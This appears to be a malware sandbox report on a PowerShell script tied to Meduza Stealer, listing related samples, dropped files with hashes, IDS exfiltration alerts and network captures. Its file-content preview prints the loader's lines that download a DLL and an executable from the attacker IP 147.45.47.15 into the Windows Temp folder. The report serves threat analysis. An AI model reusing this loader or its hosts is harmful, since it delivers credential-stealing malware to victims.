                                                                          Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                                          • api.ipify.org/
                                                                          6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                                          • api.ipify.org/
                                                                          perfcc.elfGet hashmaliciousXmrigBrowse
                                                                          • api.ipify.org/
                                                                          SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                          • api.ipify.org/
                                                                          147.45.47.15script.htaGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                          • 147.45.47.15/duschno.exe
                                                                          193.3.19.151script.htaGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                            duschno.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                              1Sj5F6P4nv.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                5LEXIucyEP.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                  44qLDKzsfO.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                    gP5rh6fa0S.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                      urkOkB0BdX.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                        8F0oMWUhg7.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          api.ipify.orgscript.htaGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                          • 104.26.12.205
                                                                                          WdlA0C4PkO.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                                          • 104.26.12.205
                                                                                          cali.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 104.26.13.205
                                                                                          Awb 4586109146.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                          • 104.26.13.205
                                                                                          PO 0309494059506060609696007.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                          • 104.26.12.205
                                                                                          Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                          • 172.67.74.152
                                                                                          winws1.exeGet hashmaliciousUnknownBrowse
                                                                                          • 104.26.12.205
                                                                                          KASHI SHIP PARTICULARS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 172.67.74.152
                                                                                          PO.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                          • 104.26.13.205
                                                                                          rDOC24INV0616.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 172.67.74.152
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          ARNES-NETAcademicandResearchNetworkofSloveniaSIscript.htaGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                          • 193.3.19.151
                                                                                          https://img10.reactor.cc/pics/post/full/Sakimichan-artist-Iono-(Pokemon)-Pok%c3%a9mon-7823638.jpegGet hashmaliciousHTMLPhisherBrowse
                                                                                          • 193.3.184.24
                                                                                          bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                          • 95.87.151.57
                                                                                          duschno.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                          • 193.3.19.151
                                                                                          jade.arm.elfGet hashmaliciousMiraiBrowse
                                                                                          • 95.87.151.72
                                                                                          https://u48551708.ct.sendgrid.net/ls/click?upn=u001.ztPEaTmy8WofhPYJ48HDSCunUq5pm5yTGRhe-2B0bVSngC8hMYiy6PgMy1xJOG8JJZaOsK-2FG9SE7UmhEzeQSXDmEf7Z3nlXZDH-2BW1HSMP6c8uYUvXDTaJRyLbPDV6bI3nnDyIlM0OJKevMwAF04rpfLmQEYS641NQTMU227kkOtBQgQK-2FNlHeN6DpPMLDgH6kuMS3X_2vbC1nrAFjePip8HYuHYOlkYXiy7Z-2FrO9MQN7lNoEgxRkovUJGAEvKvTFyRmFsa9AQlcDpFhpJzgHajMOC0yWTZOc2DdmxhrlyPvteyXbl8nlhAtf2p-2FHw4RnlZ8cxDY-2BWJeBsszGnsrXuNOI8LpL5ZYI3ad04OdxC8tHHA5tO-2Be1xS3Z9Z3VrOTM-2FT5ptoYnx5N-2FTYKQ13RZ-2FookVMhAtJ6OV43Zayd1qOmHGLwUI8-3DGet hashmaliciousPhisherBrowse
                                                                                          • 193.3.19.55
                                                                                          https://santa-secret.ru/api/verify?a=NjgyODEwNCw1bWluOHE2MHpuX3J1LC9hY2NvdW50L2JveGVzLHZsYWRpbWlyLmdsdXNoZW5rb0Bob2NobGFuZC5ydSwyNDE0MTYzMg==Get hashmaliciousUnknownBrowse
                                                                                          • 193.3.184.46
                                                                                          la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                                                          • 95.87.175.59
                                                                                          file.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                          • 193.3.168.50
                                                                                          file.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                          • 193.3.168.50
                                                                                          CLOUDFLARENETUSMFQbv2Yuzv.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                          • 104.21.64.80
                                                                                          SWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                                                                          • 104.21.86.111
                                                                                          Y41xQGmT37.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                          • 104.21.64.80
                                                                                          O3u9C8cpzl.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                          • 104.21.64.80
                                                                                          niwvNnBk2p.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                          • 104.21.64.80
                                                                                          661fW9gxDp.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.64.80
                                                                                          bPkG0wTVon.exeGet hashmaliciousUnknownBrowse
                                                                                          • 104.16.184.241
                                                                                          66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 172.67.177.134
                                                                                          S6oj0LoSiL.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.64.80
                                                                                          pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                          • 172.64.41.3
                                                                                          FREE-NET-ASFREEnetEUscript.htaGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                          • 147.45.47.15
                                                                                          R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                          • 147.45.49.155
                                                                                          R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                          • 147.45.49.155
                                                                                          s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                          • 147.45.49.155
                                                                                          boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                          • 147.45.124.54
                                                                                          boatnet.spc.elfGet hashmaliciousMiraiBrowse
                                                                                          • 147.45.124.54
                                                                                          boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                                                          • 147.45.124.54
                                                                                          boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                                                          • 147.45.124.54
                                                                                          boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                          • 147.45.124.54
                                                                                          boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                          • 147.45.124.54
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          37f463bf4616ecd445d4a1937da06e1966776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.26.12.205
                                                                                          pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                          • 104.26.12.205
                                                                                          script.htaGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                          • 104.26.12.205
                                                                                          Brooming.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                          • 104.26.12.205
                                                                                          TT copy.jsGet hashmaliciousFormBookBrowse
                                                                                          • 104.26.12.205
                                                                                          TUp6f2knn2.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.26.12.205
                                                                                          QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                          • 104.26.12.205
                                                                                          R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                          • 104.26.12.205
                                                                                          R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                          • 104.26.12.205
                                                                                          s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                          • 104.26.12.205
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          C:\Windows\Temp\xdnfl52f.civ.exescript.htaGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                            C:\Windows\Temp\Launcher.exescript.htaGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                              C:\Windows\Temp\iviewers.dllscript.htaGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                Process:C:\Windows\Temp\Launcher.exe
                                                                                                File Type:CSV text
                                                                                                Category:dropped
                                                                                                Size (bytes):226
                                                                                                Entropy (8bit):5.360398796477698
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                                                MD5:3A8957C6382192B71471BD14359D0B12
                                                                                                SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                                                SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                                                SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                                                Malicious:false
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64
                                                                                                Entropy (8bit):1.1510207563435464
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:NlllulK:NllU
                                                                                                MD5:7C7772684C9836B758223907BC2AEE9B
                                                                                                SHA1:F6FC33AF6B68C788D4F59704A3331A85C43E6FC2
                                                                                                SHA-256:38EC1F523D66248087C3A3D9BCE52F154183337CCA920C7576BF0532F2F92486
                                                                                                SHA-512:E24A56AC8327A7450047ED6599A62F6930B31DFD54E27435AF02EB6083D8896C1383730B7C0A8FB898127714EC8C0770BF8DCA4EA6B3B234FA0516915451878E
                                                                                                Malicious:false
                                                                                                Preview:@...e................................................@..........
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6222
                                                                                                Entropy (8bit):3.703159957955717
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:LXl3CioUkvhkvCCtd9LVBHGUY9LV2hHGUv:LXPLd9iUY9FUv
                                                                                                MD5:AD0F9AD43998F1D1B2BB402696953798
                                                                                                SHA1:455B224133EC27B64EC8D049D89EC581F2058E8A
                                                                                                SHA-256:D0BD0CE9A7A905696B9B896EE2F190F4614C4467B23DA2B6386442A3A5511A6F
                                                                                                SHA-512:D21AE64E07B22FEB45CA50A830CF61233E3B71A08BC10585C74CA87349BEFC7C16BAC88EBC06299F963BA27B28836FFC9B4EB2C5617551A3B9E4CA30070432FA
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.".. ...d..........Q..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......}...Q..cM...Q......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y.>....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Y.>..Roaming.@......DWSl.Y.>....C.....................a...R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.Y.>....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW r..Windows.@......DWSl.Y.>....E.....................:...W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.Y.>....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.Y.>....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.Y.>....q...........
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6222
                                                                                                Entropy (8bit):3.703159957955717
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:LXl3CioUkvhkvCCtd9LVBHGUY9LV2hHGUv:LXPLd9iUY9FUv
                                                                                                MD5:AD0F9AD43998F1D1B2BB402696953798
                                                                                                SHA1:455B224133EC27B64EC8D049D89EC581F2058E8A
                                                                                                SHA-256:D0BD0CE9A7A905696B9B896EE2F190F4614C4467B23DA2B6386442A3A5511A6F
                                                                                                SHA-512:D21AE64E07B22FEB45CA50A830CF61233E3B71A08BC10585C74CA87349BEFC7C16BAC88EBC06299F963BA27B28836FFC9B4EB2C5617551A3B9E4CA30070432FA
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.".. ...d..........Q..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......}...Q..cM...Q......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y.>....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Y.>..Roaming.@......DWSl.Y.>....C.....................a...R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.Y.>....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW r..Windows.@......DWSl.Y.>....E.....................:...W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.Y.>....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.Y.>....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.Y.>....q...........
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):206304
                                                                                                Entropy (8bit):5.9403786086887225
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:gyOSSX7XA5RwkP10/Cg+ufLLobyT9S9jHkQPEZS0bGAPo:tEXjA5yBF+ma9jHfPITGb
                                                                                                MD5:2696D944FFBEF69510B0C826446FD748
                                                                                                SHA1:E4106861076981799719876019FE5224EAC2655C
                                                                                                SHA-256:A4F53964CDDDCCCBD1B46DA4D3F7F5F4292B5DD11C833D3DB3A1E7DEF36DA69A
                                                                                                SHA-512:C286BC2DA757CBB2A28CF516A4A273DD11B15F674D5F698A713DC794F013B7502A8893AB6041E51BAB3CDD506A18C415B9DF8483B19E312F8FCB88923F42B8EB
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: script.hta, Detection: malicious, Browse
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........s..u...u...u.......u.......u...u...w.......u.......u......u.......u..Rich.u..........PE..L...........................................0....@..........................0......&G....@... .............................tH.......`...................!.......*.....T...........................H...@............@..l............................text...T........................... ..`.data...t....0......................@....idata..,....@......."..............@..@.rsrc........`.......@..............@..@.reloc...*.......,..................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):6144
                                                                                                Entropy (8bit):3.6989393576979213
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:fNnyOybUJQ23GgX791qKilsZODTgFZP/8R:fNnyOybrVO9QKilhfgFZP/u
                                                                                                MD5:E017BE56699801DC89A8D6D1724EB633
                                                                                                SHA1:A7F7AAE4744210DB8EBAF4DA06C167357BC71ECA
                                                                                                SHA-256:AA6B0863022BDA1E0C263A75AE2896FE473D3BF57A76EFC258B3AFEC8C157564
                                                                                                SHA-512:2368425DADC7F22EB11532359D4D1AA97BF3E381F4FD7B62C587E1F8819EF64A0FF7FC75CC5948939FADEBC423345AB65A1CD2799BB4136FBEA89D1F75DFC8C8
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 26%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: script.hta, Detection: malicious, Browse
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....eag...........!.................+... ...@....... ....................................@..........................@..(...\+..O....`............................................................................... ............... ..H............text........ ...................... ..`.sdata..V....@......................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1292800
                                                                                                Entropy (8bit):6.519533062327776
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:IgAMXnXkciEIMJQZe8Us9Mjemp5wx1wach0lhSMXl5xT+d:x3Xn0ciEIp3Us+egSx+ahpxTK
                                                                                                MD5:C6813DA66EBA357D0DEAA48C2F7032B8
                                                                                                SHA1:6812E46C51F823FF0B0EE17BFCE0AF72F857AF66
                                                                                                SHA-256:1420F60F053C3EA5605239EE431E5F487245108B1C01BE75D16B5246156FA178
                                                                                                SHA-512:19391C6B12BA8F34A5FAF326F8986EF8DE4729D614D72BF438C6EFA569B3505159CA55F580FE2A02642E5E7A0F1B38A7A9DB9F0D66D67BA548D84C230183159E
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_MeduzaStealer, Description: Yara detected Meduza Stealer, Source: C:\Windows\Temp\xdnfl52f.civ.exe, Author: Joe Security
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 83%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: script.hta, Detection: malicious, Browse
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.7./.d./.d./.d.W.e./.d.W.e./.d..e./.d...e./.d...e./.d...e./.d.W.e8/.d.W.e./.d.W.e./.d./.d...d.W.e./.d..e./.d.>d./.d..e./.dRich./.d........PE..d....7;g.........."....).4.......... ..........@..........................................`.................................................h...@................l..............<......8.......................(.......@............P..x............................text....2.......4.................. ..`.rdata..x....P.......8..............@..@.data....|.......Z..................@....pdata...l.......n...<..............@..@.rsrc...............................@..@.reloc..<...........................@..B................................................................................................................................................................................................................................
                                                                                                File type:ASCII text, with CRLF line terminators
                                                                                                Entropy (8bit):5.14538708249427
                                                                                                TrID:
                                                                                                  File name:script.ps1
                                                                                                  File size:324 bytes
                                                                                                  MD5:129bf31d3dc155699387ccc33f2f3775
                                                                                                  SHA1:1f43dcd5742a8f0b499892fd3e09255378817adc
                                                                                                  SHA256:b1d2df274b2539ad80debafc925c0cf6a2c2394093e57a8e1d0023d3fc13dba3
                                                                                                  SHA512:37f6f05e14cb7a78e7f245da4834b2be124e181c96c50a314dd29fc0c2b06c369b4510d068baf34495be5566e41a7d4852582643ce13beaded84720c3c3c9643
                                                                                                  SSDEEP:6:yHfeEI4uKxErcdb7iwaUBuzwa1dbD3Lh8J0i7XarD3Lh8JN3rdRLKMFIsC/:C4XKP61U4z1XrGmia7GX3PeMnC/
                                                                                                  TLSH:D0E07D081287037CC0E88708241042EE960FF5DC2F7D0C77EC5A35863C0349A1D9EB98
                                                                                                  File Content Preview:..$dllPath = "C:\Windows\Temp\iviewers.dll"..$exePath = "C:\Windows\Temp\Launcher.exe"....$dllUrl = "http://147.45.47.15/iviewers.dll"..$exeUrl = "http://147.45.47.15/Launcher.exe"....Invoke-WebRequest -Uri $dllUrl -OutFile $dllPath....Invoke-WebRequest -
                                                                                                  Icon Hash:3270d6baae77db44
                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                  2024-12-19T08:52:42.649350+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704147.45.47.1580TCP
                                                                                                  2024-12-19T08:53:04.832885+01002049441ET MALWARE Win32/Unknown Grabber Base64 Data Exfiltration Attempt1192.168.2.549709193.3.19.15115666TCP
                                                                                                  2024-12-19T08:53:04.832885+01002050806ET MALWARE [ANY.RUN] Meduza Stealer Exfiltration M21192.168.2.549709193.3.19.15115666TCP
                                                                                                  2024-12-19T08:53:04.832885+01002050807ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP)1192.168.2.549709193.3.19.15115666TCP
                                                                                                  2024-12-19T08:53:04.952744+01002050806ET MALWARE [ANY.RUN] Meduza Stealer Exfiltration M21192.168.2.549709193.3.19.15115666TCP
                                                                                                  2024-12-19T08:53:04.952744+01002050807ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP)1192.168.2.549709193.3.19.15115666TCP
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Dec 19, 2024 08:52:40.843966961 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:40.963613033 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:40.963700056 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:40.967886925 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:41.087639093 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.215856075 CET8049704147.45.47.15192.168.2.5
